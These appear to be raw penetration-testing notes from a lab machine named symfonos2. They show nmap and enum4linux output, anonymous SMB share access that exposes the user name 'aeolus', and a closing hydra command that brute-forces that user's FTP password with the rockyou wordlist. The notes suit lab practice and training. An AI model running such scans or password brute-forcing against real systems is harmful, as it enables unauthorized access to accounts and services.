
nmap -sV -sC -Pn  10.10.10.23 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 10:15 EST
Nmap scan report for 10.10.10.23
Host is up (0.00053s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp  open  http        WebFS httpd 1.21
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)


Host script results:
|_clock-skew: mean: 1h59m58s, deviation: 3h27m50s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2024-12-15T09:17:13-06:00
| smb2-time: 
|   date: 2024-12-15T15:17:13
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)


enum4linux 10.10.10.23 varrer netbios

 Share Enumeration on 10.10.10.23 )==================================
                                                                                                                             
                                                                                                                             
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS2

[+] Attempting to map shares on 10.10.10.23                                                                                  
                                                                                                                             
//10.10.10.23/print$    Mapping: DENIED Listing: N/A Writing: N/A                                                            
//10.10.10.23/anonymous Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:                                                                                               
                                                                                                                             
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*                                                                                   
//10.10.10.23/IPC$      Mapping: N/A Listing: N/A Writing: N/A


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
                                                                                                                             
S-1-22-1-1000 Unix User\aeolus (Local User)                                                                                  
S-1-22-1-1001 Unix User\cronus (Local User)


smbclient \\\\10.10.10.15\\anonymous 
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> 

get log.txt

# Set the user and group under which the server will run.
User                            aeolus
Group                           aeolus

use hydra for online attack

locate rockyou.txt 2>/dev/null
/usr/share/wordlists/rockyou.gz
hydra -l aeolus -P /usr/share/wordlists/rockyou.gz 10.10.10.15 ftp





